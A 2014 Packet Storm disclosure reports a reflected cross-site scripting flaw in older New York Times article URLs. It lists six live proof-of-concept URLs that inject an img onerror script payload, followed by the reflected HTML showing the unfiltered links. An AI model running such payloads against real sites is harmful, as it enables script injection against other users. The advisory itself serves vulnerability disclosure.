New York Times Cross Site Scripting

2014-10-16T00:00:00
ID PACKETSTORM:128717
Type packetstorm
Reporter Jing Wang
Modified 2014-10-16T00:00:00

Description

                                        
                                            `New York Times nytimes.com Page Design XSS Vulnerability (Almost all  
Article Pages Before 2013 are Affected)  
  
  
Domain:  
http://www.nytimes.com/  
  
  
  
Vulnerability Description:  
The vulnerability occurs at New York Times’s URLs. Nytimes (short for New  
York Times) uses part of the URLs to construct its pages. However, it seems  
that Nytimes does not filter the content used for the construction at all  
before 2013.  
  
Based on Nytimes’s Design, Almost all URLs before 2013 are affected (All  
pages of articles). In fact, all article pages that contain “PRINT” button,  
“SINGLE PAGE” button, “Page *” button, “NEXT PAGE” button are affected.  
  
Nytimes changed this mechanism since 2013. It decodes the URLs sent to its  
server. This makes the mechanism much safer now.  
  
However, all URLs before 2013 are still using the old mechanism. This means  
almost all article pages before 2013 are still vulnerable to XSS attacks. I  
guess the reason Nytimes does not filter URLs before is cost. It costs too  
much (money & human capital) to change the database of all posted articles  
before.  
  
  
  
  
Living POCs:  
http://www.nytimes.com/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/“><img  
src=x onerror=prompt(‘justqdjing’)>  
http://www.nytimes.com/2011/01/09/travel/09where-to-go.html/“><img src=x  
onerror=prompt(‘justqdjing’)>?pagewanted=all&_r=0  
http://www.nytimes.com/2010/12/07/opinion/07brooks.html/“><img src=x  
onerror=prompt(‘justqdjing’)>  
http://www.nytimes.com/2009/08/06/technology/06stats.html/“><img src=x  
onerror=prompt(‘justqdjing’)>  
http://www.nytimes.com/2008/07/09/dining/091crex.html/“><img src=x  
onerror=prompt(‘justqdjing’)>  
http://www.nytimes.com/2007/11/14/opinion/lweb14brain.html/“><img src=x  
onerror=prompt(‘justqdjing’)>  
  
  
  
  
POC Video:  
https://www.youtube.com/user/tetraph  
  
  
  
  
Vulnerability Analysis:  
Take the following link as an example,  
http://www.nytimes.com/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/  
“><vulnerabletoattack  
  
We can see that for the page reflected, it contains the following codes.  
All of them are vulnerable.  
  
<li class=”print”>  
<a  
href=”/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/”><vulnerabletoattack?pagewanted=print”>Print</testtesttest?pagewanted=print”></a>  
</li>  
  
<li class=”singlePage”>  
<a  
href=”/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/”><testtesttest?pagewanted=all”>  
Single Page</vulnerabletoattack?pagewanted=all”></a>  
</li>  
  
<li> <a onclick=”s_code_linktrack(‘Article-MultiPagePageNum2′);”  
title=”Page 2″  
href=”/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/”><vulnerabletoattack?pagewanted=2″>2</testtesttest?pagewanted=2″></a>  
</li>  
  
<li> <a onclick=”s_code_linktrack(‘Article-MultiPagePageNum3′);”  
title=”Page 3″  
href=”/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/”><vulnerabletoattack?pagewanted=3″>3</testtesttest?pagewanted=3″></a>  
</li>  
  
<a class=”next” onclick=”s_code_linktrack(‘Article-MultiPage-Next’);”  
title=”Next Page”  
href=”/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/”><vulnerabletoattack?pagewanted=2″>Next  
Page »</testtesttest?pagewanted=2″></a>  
  
  
  
  
  
The vulnerability can be attacked without user login. Tests were performed  
on Firefox (26.0) in Ubuntu (12.04) and IE (9.0.15) in Windows 7.  
  
  
  
  
  
Cross-site scripting (XSS) is a type of computer security vulnerability  
typically found in Web applications. XSS enables attackers to inject  
client-side script into Web pages viewed by other users. A cross-site  
scripting vulnerability may be used by attackers to bypass access controls  
such as the same origin policy.  
  
  
  
  
  
Reported By:  
Wang Jing, mathematics student from Nanyang Technological University,  
Singapore.  
http://tetraph.com/wangjing/  
  
  
  
  
More Details:  
http://www.tetraph.com/blog/xss-vulnerability/new-york-times-nytimes-com-page-design-xss-vulnerability-almost-all-article-pages-are-affected/  
  
  
`